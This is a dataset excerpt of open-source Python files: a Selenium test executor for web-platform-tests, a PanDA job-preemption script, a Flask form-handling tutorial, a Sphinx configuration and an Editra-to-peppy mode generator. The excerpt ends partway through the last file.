Dataset columns (in row order):
repo_name: string (lengths 5 to 92)
path: string (lengths 4 to 232)
copies: string (19 distinct values)
size: string (lengths 4 to 7)
content: string (lengths 721 to 1.04M)
license: string (15 distinct values)
hash: int64 (-9,223,277,421,539,062,000 to 9,222,525,072B)
line_mean: float64 (6.51 to 99.8)
line_max: int64 (15 to 997)
alpha_frac: float64 (0.25 to 0.96)
autogenerated: bool (1 distinct value)
repo_name: sadmansk/servo | path: tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/executors/executorselenium.py | copies: 1 | size: 13993 | content:
import json
import os
import socket
import threading
import traceback
import urlparse
import uuid
from .base import (CallbackHandler,
RefTestExecutor,
RefTestImplementation,
TestharnessExecutor,
extra_timeout,
strip_server)
from .protocol import (BaseProtocolPart,
TestharnessProtocolPart,
Protocol,
SelectorProtocolPart,
ClickProtocolPart,
SendKeysProtocolPart,
ActionSequenceProtocolPart,
TestDriverProtocolPart)
from ..testrunner import Stop
here = os.path.join(os.path.split(__file__)[0])
webdriver = None
exceptions = None
RemoteConnection = None
Command = None
def do_delayed_imports():
global webdriver
global exceptions
global RemoteConnection
global Command
from selenium import webdriver
from selenium.common import exceptions
from selenium.webdriver.remote.remote_connection import RemoteConnection
from selenium.webdriver.remote.command import Command
class SeleniumBaseProtocolPart(BaseProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def execute_script(self, script, async=False):
method = self.webdriver.execute_async_script if async else self.webdriver.execute_script
return method(script)
def set_timeout(self, timeout):
self.webdriver.set_script_timeout(timeout * 1000)
@property
def current_window(self):
return self.webdriver.current_window_handle
def set_window(self, handle):
self.webdriver.switch_to_window(handle)
def wait(self):
while True:
try:
self.webdriver.execute_async_script("")
except exceptions.TimeoutException:
pass
except (socket.timeout, exceptions.NoSuchWindowException,
exceptions.ErrorInResponseException, IOError):
break
except Exception as e:
self.logger.error(traceback.format_exc(e))
break
class SeleniumTestharnessProtocolPart(TestharnessProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
self.runner_handle = None
with open(os.path.join(here, "runner.js")) as f:
self.runner_script = f.read()
def load_runner(self, url_protocol):
if self.runner_handle:
self.webdriver.switch_to_window(self.runner_handle)
url = urlparse.urljoin(self.parent.executor.server_url(url_protocol),
"/testharness_runner.html")
self.logger.debug("Loading %s" % url)
self.webdriver.get(url)
self.runner_handle = self.webdriver.current_window_handle
format_map = {"title": threading.current_thread().name.replace("'", '"')}
self.parent.base.execute_script(self.runner_script % format_map)
def close_old_windows(self):
handles = [item for item in self.webdriver.window_handles if item != self.runner_handle]
for handle in handles:
try:
self.webdriver.switch_to_window(handle)
self.webdriver.close()
except exceptions.NoSuchWindowException:
pass
self.webdriver.switch_to_window(self.runner_handle)
return self.runner_handle
def get_test_window(self, window_id, parent):
test_window = None
try:
# Try using the JSON serialization of the WindowProxy object,
# it's in Level 1 but nothing supports it yet
win_s = self.webdriver.execute_script("return window['%s'];" % window_id)
win_obj = json.loads(win_s)
test_window = win_obj["window-fcc6-11e5-b4f8-330a88ab9d7f"]
except Exception:
pass
if test_window is None:
after = self.webdriver.window_handles
if len(after) == 2:
test_window = next(iter(set(after) - set([parent])))
elif after[0] == parent and len(after) > 2:
# Hope the first one here is the test window
test_window = after[1]
else:
raise Exception("unable to find test window")
assert test_window != parent
return test_window
class SeleniumSelectorProtocolPart(SelectorProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def elements_by_selector(self, selector):
return self.webdriver.find_elements_by_css_selector(selector)
class SeleniumClickProtocolPart(ClickProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def element(self, element):
return element.click()
class SeleniumSendKeysProtocolPart(SendKeysProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_keys(self, element, keys):
return element.send_keys(keys)
class SeleniumActionSequenceProtocolPart(ActionSequenceProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_actions(self, actions):
self.webdriver.execute(Command.W3C_ACTIONS, {"actions": actions})
class SeleniumTestDriverProtocolPart(TestDriverProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_message(self, message_type, status, message=None):
obj = {
"type": "testdriver-%s" % str(message_type),
"status": str(status)
}
if message:
obj["message"] = str(message)
self.webdriver.execute_script("window.postMessage(%s, '*')" % json.dumps(obj))
class SeleniumProtocol(Protocol):
implements = [SeleniumBaseProtocolPart,
SeleniumTestharnessProtocolPart,
SeleniumSelectorProtocolPart,
SeleniumClickProtocolPart,
SeleniumSendKeysProtocolPart,
SeleniumTestDriverProtocolPart,
SeleniumActionSequenceProtocolPart]
def __init__(self, executor, browser, capabilities, **kwargs):
do_delayed_imports()
super(SeleniumProtocol, self).__init__(executor, browser)
self.capabilities = capabilities
self.url = browser.webdriver_url
self.webdriver = None
def connect(self):
"""Connect to browser via Selenium's WebDriver implementation."""
self.logger.debug("Connecting to Selenium on URL: %s" % self.url)
self.webdriver = webdriver.Remote(command_executor=RemoteConnection(self.url.strip("/"),
resolve_ip=False),
desired_capabilities=self.capabilities)
def after_conect(self):
pass
def teardown(self):
self.logger.debug("Hanging up on Selenium session")
try:
self.webdriver.quit()
except Exception:
pass
del self.webdriver
def is_alive(self):
try:
# Get a simple property over the connection
self.webdriver.current_window_handle
# TODO what exception?
except (socket.timeout, exceptions.ErrorInResponseException):
return False
return True
def after_connect(self):
self.testharness.load_runner(self.executor.last_environment["protocol"])
class SeleniumRun(object):
def __init__(self, func, protocol, url, timeout):
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
timeout = self.timeout
try:
self.protocol.base.set_timeout((timeout + extra_timeout))
except exceptions.ErrorInResponseException:
self.logger.error("Lost WebDriver connection")
return Stop
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(timeout + 2 * extra_timeout)
if self.result is None:
if flag:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self._run fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "self._run didn't set a result")
else:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.protocol, self.url, self.timeout)
except exceptions.TimeoutException:
self.result = False, ("EXTERNAL-TIMEOUT", None)
except (socket.timeout, exceptions.ErrorInResponseException):
self.result = False, ("CRASH", None)
except Exception as e:
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", e)
finally:
self.result_flag.set()
class SeleniumTestharnessExecutor(TestharnessExecutor):
supports_testdriver = True
def __init__(self, browser, server_config, timeout_multiplier=1,
close_after_done=True, capabilities=None, debug_info=None,
**kwargs):
"""Selenium-based executor for testharness.js tests"""
TestharnessExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = SeleniumProtocol(self, browser, capabilities)
with open(os.path.join(here, "testharness_webdriver.js")) as f:
self.script = f.read()
with open(os.path.join(here, "testharness_webdriver_resume.js")) as f:
self.script_resume = f.read()
self.close_after_done = close_after_done
self.window_id = str(uuid.uuid4())
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
if new_environment["protocol"] != self.last_environment["protocol"]:
self.protocol.testharness.load_runner(new_environment["protocol"])
def do_test(self, test):
url = self.test_url(test)
success, data = SeleniumRun(self.do_testharness,
self.protocol,
url,
test.timeout * self.timeout_multiplier).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_testharness(self, protocol, url, timeout):
format_map = {"abs_url": url,
"url": strip_server(url),
"window_id": self.window_id,
"timeout_multiplier": self.timeout_multiplier,
"timeout": timeout * 1000}
parent_window = protocol.testharness.close_old_windows()
# Now start the test harness
protocol.base.execute_script(self.script % format_map, async=True)
test_window = protocol.testharness.get_test_window(self.window_id, parent_window)
handler = CallbackHandler(self.logger, protocol, test_window)
while True:
self.protocol.base.set_window(test_window)
result = protocol.base.execute_script(
self.script_resume % format_map, async=True)
done, rv = handler(result)
if done:
break
return rv
class SeleniumRefTestExecutor(RefTestExecutor):
def __init__(self, browser, server_config, timeout_multiplier=1,
screenshot_cache=None, close_after_done=True,
debug_info=None, capabilities=None, **kwargs):
"""Selenium WebDriver-based executor for reftests"""
RefTestExecutor.__init__(self,
browser,
server_config,
screenshot_cache=screenshot_cache,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = SeleniumProtocol(self, browser,
capabilities=capabilities)
self.implementation = RefTestImplementation(self)
self.close_after_done = close_after_done
self.has_window = False
with open(os.path.join(here, "reftest.js")) as f:
self.script = f.read()
with open(os.path.join(here, "reftest-wait_webdriver.js")) as f:
self.wait_script = f.read()
def is_alive(self):
return self.protocol.is_alive()
def do_test(self, test):
self.logger.info("Test requires OS-level window focus")
self.protocol.webdriver.set_window_size(600, 600)
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def screenshot(self, test, viewport_size, dpi):
# https://github.com/w3c/wptrunner/issues/166
assert viewport_size is None
assert dpi is None
return SeleniumRun(self._screenshot,
self.protocol,
self.test_url(test),
test.timeout).run()
def _screenshot(self, protocol, url, timeout):
webdriver = protocol.webdriver
webdriver.get(url)
webdriver.execute_async_script(self.wait_script)
screenshot = webdriver.get_screenshot_as_base64()
# strip off the data:image/png;base64, part of the url
if screenshot.startswith("data:image/png;base64,"):
screenshot = screenshot.split(",", 1)[1]
return screenshot
license: mpl-2.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| 6,949,301,740,680,533,000 | 34.787724 | 96 | 0.597513 | false |
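An aside on the executor file above: its SeleniumRun class coordinates a worker thread with a timeout through a threading.Event. Below is a minimal, self-contained sketch of that pattern with Selenium stripped out; TimedRun and slow_square are illustrative names, not part of the original file.

import threading

class TimedRun(object):
    """Run func(*args) on a worker thread and give up after `timeout` seconds."""
    def __init__(self, func, timeout):
        self.func = func
        self.timeout = timeout
        self.result = None
        self.result_flag = threading.Event()

    def run(self, *args):
        worker = threading.Thread(target=self._run, args=args)
        worker.start()
        finished = self.result_flag.wait(self.timeout)
        if self.result is None:
            # Worker either timed out or died without recording a result.
            self.result = (False, "EXTERNAL-TIMEOUT" if not finished else "INTERNAL-ERROR")
        return self.result

    def _run(self, *args):
        try:
            self.result = (True, self.func(*args))
        except Exception as e:
            self.result = (False, e)
        finally:
            self.result_flag.set()

def slow_square(x):
    return x * x

print(TimedRun(slow_square, timeout=1.0).run(7))  # -> (True, 49)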
repo_name: PanDAWMS/panda-server | path: pandaserver/test/esPreemption.py | copies: 1 | size: 4461 | content:
import datetime
from pandaserver.taskbuffer.TaskBuffer import taskBuffer
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandacommon.pandalogger.LogWrapper import LogWrapper
from pandaserver.brokerage.SiteMapper import SiteMapper
from pandaserver.taskbuffer import ErrorCode
# password
from pandaserver.config import panda_config
# logger
_logger = PandaLogger().getLogger('esPreemption')
tmpLog = LogWrapper(_logger)
tmpLog.debug("================= start ==================")
# instantiate TB
taskBuffer.init(panda_config.dbhost,panda_config.dbpasswd,nDBConnection=1)
# instantiate sitemapper
siteMapper = SiteMapper(taskBuffer)
# time limit
timeLimit = datetime.datetime.utcnow()-datetime.timedelta(minutes=15)
# get low priority ES jobs per site
sqlEsJobs = "SELECT PandaID,computingSite,commandToPilot,startTime "
sqlEsJobs += "FROM {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlEsJobs += "WHERE prodSourceLabel IN (:label1,:label2) AND eventService=:es "
sqlEsJobs += "AND currentPriority<:prio AND jobStatus=:jobStat "
sqlEsJobs += "ORDER BY currentPriority,PandaID "
varMap = {}
varMap[':label1'] = 'managed'
varMap[':label2'] = 'test'
varMap[':es'] = 1
varMap[':prio'] = 200
varMap[':jobStat'] = 'running'
# exec
status,res = taskBuffer.querySQLS(sqlEsJobs,varMap,arraySize=100000)
if res is None:
tmpLog.debug("total %s " % res)
else:
tmpLog.debug("total %s " % len(res))
# get number of jobs per site
siteJobsMap = {}
for pandaID,siteName,commandToPilot,startTime in res:
if siteName not in siteJobsMap:
siteJobsMap[siteName] = {'running':[],
'killing':[]}
if commandToPilot == 'tobekilled':
siteJobsMap[siteName]['killing'].append(pandaID)
else:
# kill only old jobs
if startTime < timeLimit:
siteJobsMap[siteName]['running'].append(pandaID)
# sql to get number of high priority jobs
sqlHiJobs = "SELECT count(*) FROM {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlHiJobs += "WHERE prodSourceLabel=:label AND jobStatus IN (:jobStat1,:jobStat2) "
sqlHiJobs += "AND currentPriority>=:prio AND computingSite=:site AND eventService IS NULL "
sqlHiJobs += "AND startTime<:timeLimit "
# sql to kill job
sqlKill = "UPDATE {0}.jobsActive4 ".format(panda_config.schemaPANDA)
sqlKill += "SET commandToPilot=:com,supErrorCode=:code,supErrorDiag=:diag "
sqlKill += "WHERE PandaID=:pandaID AND jobStatus=:jobStatus "
# check all sites
for siteName in siteJobsMap:
jobsMap = siteJobsMap[siteName]
# check jobseed
siteSpec = siteMapper.getSite(siteName)
# skip ES-only sites
if siteSpec.getJobSeed() == 'es':
continue
# get number of high priority jobs
varMap = {}
varMap[':label'] = 'managed'
varMap[':jobStat1'] = 'activated'
varMap[':jobStat2'] = 'starting'
varMap[':prio'] = 800
varMap[':site'] = siteName
varMap[':timeLimit'] = timeLimit
status,res = taskBuffer.querySQLS(sqlHiJobs,varMap)
if res is not None:
nJobs = res[0][0]
nJobsToKill = nJobs-len(siteJobsMap[siteName]['killing'])
tmpLog.debug("site={0} nHighPrioJobs={1} nRunnigES={2} nKillingES={3} nESToKill={4}".format(siteName,nJobs,
len(siteJobsMap[siteName]['running']),
len(siteJobsMap[siteName]['killing']),
nJobsToKill))
# not enough jobs are being killed
if nJobsToKill > 0:
# kill ES jobs
for pandaID in siteJobsMap[siteName]['running'][:nJobsToKill]:
tmpLog.debug(" kill PandaID={0}".format(pandaID))
varMap = {}
varMap[':pandaID'] = pandaID
varMap[':jobStatus'] = 'running'
varMap[':code'] = ErrorCode.EC_EventServicePreemption
varMap[':diag'] = 'preempted'
varMap[':com'] = 'tobekilled'
status,res = taskBuffer.querySQLS(sqlKill,varMap)
tmpLog.debug("================= end ==================")
license: apache-2.0 | hash, line_mean, line_max, alpha_frac, autogenerated:
| 276,448,549,621,969,950 | 42.31068 | 142 | 0.59471 | false |
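A note on the preemption script above: before deciding how many event-service jobs to kill per site, it buckets the rows returned by the first query into running and killing lists. A standalone sketch of that bucketing step, using invented sample rows instead of a database:

import datetime

time_limit = datetime.datetime.utcnow() - datetime.timedelta(minutes=15)
rows = [
    (1001, 'SITE_A', None, datetime.datetime(2020, 1, 1)),
    (1002, 'SITE_A', 'tobekilled', datetime.datetime(2020, 1, 1)),
    (1003, 'SITE_B', None, datetime.datetime.utcnow()),
]
site_jobs = {}
for panda_id, site, command_to_pilot, start_time in rows:
    bucket = site_jobs.setdefault(site, {'running': [], 'killing': []})
    if command_to_pilot == 'tobekilled':
        bucket['killing'].append(panda_id)
    elif start_time < time_limit:
        # Only jobs that have been running long enough are preemption candidates.
        bucket['running'].append(panda_id)
print(site_jobs)
# {'SITE_A': {'running': [1001], 'killing': [1002]}, 'SITE_B': {'running': [], 'killing': []}}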
repo_name: ftomassetti/polito_information_systems_python | path: forms/example_2.py | copies: 1 | size: 1451 | content:
from flask import Flask,request
app = Flask("My app with forms")
app.debug = True
@app.route('/register')
def show_registration_form():
# VIEW
response = '<html>'
response += ' <h1>Registration form</h1>'
response += ' <form name="registration" action="submit_registration_form" method="post">'
response += ' First name : <input type="text" name="firstname"><br/>'
response += ' Last name : <input type="text" name="lastname"><br/>'
response += ' Username : <input type="text" name="username"><br/>'
response += ' Password : <input type="password" name="password"><br/>'
response += ' Confirm password : <input type="password" name="confpassword"><br/>'
response += ' <input type="submit" value="Submit">'
response += ' </form>'
response += '</html>'
return response
@app.route('/submit_registration_form',methods=['POST'])
def process_registration_form():
print('Form')
print(request.form)
# CONTROLLER
password_match = request.form['password']==request.form['confpassword']
print("Password match? "+str(password_match))
# if password do not match we would like to send back the
# user and refill the form with the information that were
# correct...
# VIEW
response = '<html>'
if password_match:
response += ' <h1>Thank you for registering!</h1>'
else:
response += ' <h1>Problem with the registration</h1>'
response += '</html>'
return response
app.run()
license: mit | hash, line_mean, line_max, alpha_frac, autogenerated:
| -4,677,855,903,865,515,000 | 32 | 91 | 0.651275 | false |
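A quick way to exercise the two Flask routes above is the built-in test client. The sketch below assumes the file is importable as example_2 and that the trailing app.run() call has been moved under an if __name__ == '__main__': guard so the import does not start the server:

from example_2 import app

client = app.test_client()
assert b'Registration form' in client.get('/register').data

resp = client.post('/submit_registration_form', data={
    'firstname': 'Ada', 'lastname': 'Lovelace', 'username': 'ada',
    'password': 'secret', 'confpassword': 'secret',
})
assert b'Thank you for registering!' in resp.data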
repo_name: andras-tim/sphinxcontrib-httpdomain | path: doc/conf.py | copies: 1 | size: 8340 | content:
# -*- coding: utf-8 -*-
#
# sphinxcontrib-httpdomain documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 2 13:27:52 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinxcontrib.httpdomain', 'sphinxcontrib.autohttp.flask',
'sphinxcontrib.autohttp.bottle',
'sphinxcontrib.autohttp.tornado',
'sphinx.ext.extlinks']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sphinxcontrib-httpdomain'
copyright = u'2011, Hong Minhee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.3'
# The full version, including alpha/beta/rc tags.
release = '1.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sphinxcontrib-httpdomaindoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sphinxcontrib-httpdomain.tex',
u'sphinxcontrib-httpdomain Documentation',
u'Hong Minhee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sphinxcontrib-httpdomain',
u'sphinxcontrib-httpdomain Documentation',
[u'Hong Minhee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sphinxcontrib-httpdomain',
u'sphinxcontrib-httpdomain Documentation', u'Hong Minhee',
'sphinxcontrib-httpdomain', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
extlinks = {
'pull': ('https://bitbucket.org/birkenfeld/sphinx-contrib/pull-request/%s/',
'pull request #'),
'issue': ('https://bitbucket.org/birkenfeld/sphinx-contrib/issue/%s/',
'issue #')
}
license: bsd-2-clause | hash, line_mean, line_max, alpha_frac, autogenerated:
| 1,940,652,276,734,229,500 | 31.834646 | 80 | 0.702158 | false |
repo_name: robmcmullen/peppy | path: editra.in/make-major-modes-from-editra.py | copies: 1 | size: 13072 | content:
#!/usr/bin/env python
import os, shutil, sys, glob, imp
import __builtin__
import ConfigParser
from cStringIO import StringIO
from optparse import OptionParser
import wx.stc
__builtin__._ = str
sys.path.append("..")
from peppy.debug import *
from facade import *
facade = EditraFacade()
class_attr_template = ''' keyword = '%(keyword)s'
editra_synonym = '%(lang)s'
stc_lexer_id = %(lexer)s
start_line_comment = %(start_comment)s
end_line_comment = %(end_comment)s'''
classprefs_template = ''' StrParam('extensions', '%(extensions)s', fullwidth=True),'''
keyword_set_template = ''' StrParam('keyword_set_%d', unique_keywords[%d], hidden=False, fullwidth=True),'''
template = '''# peppy Copyright (c) 2006-2009 Rob McMullen
# Licenced under the GPLv2; see http://peppy.flipturn.org for more info
"""%(lang)s programming language editing support.
Major mode for editing %(lang)s files.
Supporting actions and minor modes should go here only if they are uniquely
applicable to this major mode and can't be used in other major modes. If
actions can be used with multiple major modes, they should be put in a
separate plugin in the peppy/plugins directory.
"""
import os
import wx
import wx.stc
from peppy.lib.foldexplorer import *
from peppy.lib.autoindent import *
from peppy.yapsy.plugins import *
from peppy.major import *
from peppy.fundamental import FundamentalMode
from peppy.editra.style_specs import unique_keywords
class %(class_name)sMode(FundamentalMode):
"""Stub major mode for editing %(keyword)s files.
This major mode has been automatically generated and is a boilerplate/
placeholder major mode. Enhancements to this mode are appreciated!
"""
%(class_attrs)s
icon = 'icons/page_white.png'
default_classprefs = (
%(classprefs)s
)
class %(class_name)sModePlugin(IPeppyPlugin):
"""Plugin to register modes and user interface for %(keyword)s
"""
def getMajorModes(self):
yield %(class_name)sMode
'''
# Global lists and dicts used by the processing routines below
langs = facade.getAllEditraLanguages()
extra_properties = {}
syntax_style_specs = {}
keywords = {}
stc_lexer_id = {}
for lang in langs:
keyword = facade.getPeppyModeKeyword(lang)
#dprint(keyword)
extra_properties[keyword] = facade.getEditraExtraProperties(lang)
syntax_style_specs[keyword] = facade.getEditraSyntaxSpecs(lang)
keywords[keyword] = facade.getEditraLanguageKeywords(lang)
stc_lexer_id[keyword] = facade.getEditraSTCLexer(lang)
def findCommonKeywords(keywords):
unique_keywords = []
unique_id = 0
keywords_text = {}
keywords_mapping = {}
for lang, keyword_dict in keywords.iteritems():
if lang not in keywords_mapping:
dprint("adding %s" % lang)
keywords_mapping[lang] = {}
try:
for id, text in keyword_dict.iteritems():
# keyword_spec is a tuple of int and string
if text in keywords_text:
dprint("found common for %s, %d: %s" % (lang, id, keywords_text[text]))
keywords_mapping[lang][id] = keywords_text[text]
else:
keywords_text[text] = unique_id
unique_keywords.append(text)
keywords_mapping[lang][id] = unique_id
unique_id += 1
except (ValueError, TypeError):
dprint(lang)
dprint(keyword_spec_list)
raise
except KeyError:
dprint(keywords_mapping.keys())
raise
dprint(keywords_mapping)
return unique_keywords, keywords_mapping
unique_keywords, keywords_mapping = findCommonKeywords(keywords)
# Processing routines
def process(destdir):
missing, existing = getDefinedModes(destdir)
for mode in missing:
convertEditraMode(destdir, mode)
for mode in existing:
updateEditraMode(destdir, mode)
def getDefinedModes(destdir):
langs = facade.getAllEditraLanguages()
missing = []
existing = []
for lang in langs:
module_name = facade.getPeppyFileName(lang)
module_path = os.path.join(destdir, module_name + ".py")
if os.path.exists(module_path):
#dprint("found %s -> %s -> %s" % (lang, module_name, module_path))
existing.append(lang)
else:
#dprint("CREATING %s -> %s -> %s" % (lang, module_name, module_path))
missing.append(lang)
return missing, existing
def getEditraInfo(lang):
module_name = facade.getPeppyFileName(lang)
syn = facade.getEditraSyntaxData(lang)
keyword = facade.getPeppyModeKeyword(lang)
vals = {
'lang': lang,
'keyword': keyword,
'class_name': facade.getPeppyClassName(lang),
'module_name': module_name,
'extensions': " ".join(facade.getExtensionsForLanguage(lang)),
'lexer': facade.getEditraSTCLexerName(lang),
'start_comment': repr(facade.getEditraCommentChars(lang)[0]),
'end_comment': repr(facade.getEditraCommentChars(lang)[1]),
}
vals['class_attrs'] = class_attr_template % vals
classprefs = classprefs_template % vals
order = sorted(keywords_mapping[keyword].iteritems())
for keyword_set_id, unique_id in order:
classprefs += "\n" + keyword_set_template % (keyword_set_id, unique_id)
vals['classprefs'] = classprefs
return module_name, vals
def convertEditraMode(destdir, lang):
module_name, vals = getEditraInfo(lang)
module_path = os.path.join(destdir, module_name + ".py")
text = template % vals
#print(text)
fh = open(module_path, 'w')
fh.write(text)
fh.close()
generatePluginFile(destdir, lang)
def updateEditraMode(destdir, lang):
module_name, vals = getEditraInfo(lang)
module_path = os.path.join(destdir, module_name + ".py")
fh = open(module_path, 'r')
text = fh.read()
fh.close()
classtext = ClassText(text, lang)
classtext.replace(vals)
fh = open(module_path, 'w')
fh.write(str(classtext))
fh.close()
class ClassText(object):
"""Gets the class attribute section of the major mode class
"""
def __init__(self, text, lang):
self.header = ""
self.class_attrs = ""
self.classprefs = ""
self.footer = ""
self.lang = lang
self.parse(text)
def __str__(self):
#return "Class Attribute Section: %s\nClass Preference Section: %s"% (self.class_attrs, self.classprefs)
return self.header + self.class_attrs + self.classprefs + self.footer
def parse(self, text):
classmatch = "class %sMode(" % facade.getPeppyClassName(self.lang)
#dprint(classmatch)
state = "header"
for line in text.splitlines(True):
#dprint(line)
if state == "header":
if line.startswith(classmatch):
state = "in_class"
else:
self.header += line
if state == "in_class":
if line.strip().startswith("keyword =") or line.strip().startswith("keyword="):
state = "class_attrs"
else:
self.header += line
if state == "class_attrs":
if line.strip().startswith("default_classprefs"):
state = "classprefs"
else:
self.class_attrs += line
if state == "classprefs":
if line.strip() == ")":
state = "footer"
else:
self.classprefs += line
if state == "footer":
self.footer += line
def replace(self, vals):
"""Replace any class attributes or classprefs with the new values
"""
self.replaceImports()
self.replaceClassAttrs(vals)
self.replaceClassprefs(vals)
def replaceImports(self):
"""Special case to add the unique_keywords dict to the list of imports
In versions prior to r2412, the import statement for unique_keywords
from peppy.editra.style_specs didn't exist. Now that keywords can be
modified by the user, the import statement must be included because
the StrParams reference the unique_keywords dict to supply defaults
for the preferences.
"""
extra = "from peppy.editra.style_specs import unique_keywords"
try:
self.header.index(extra)
except ValueError:
dprint("Replacing imports for %s" % self.lang)
index = self.header.index("from peppy.fundamental import")
self.header = self.header[0:index] + extra + "\n" + self.header[index:]
def replaceClassAttrs(self, vals):
newattrs = vals['class_attrs']
keywords = {}
for attrline in newattrs.splitlines():
keyword, value = attrline.split("=")
keyword = keyword.strip()
keywords[keyword] = attrline
lines = self.class_attrs.splitlines(True)
newlines = ""
for line in lines:
splitted = line.split("=")
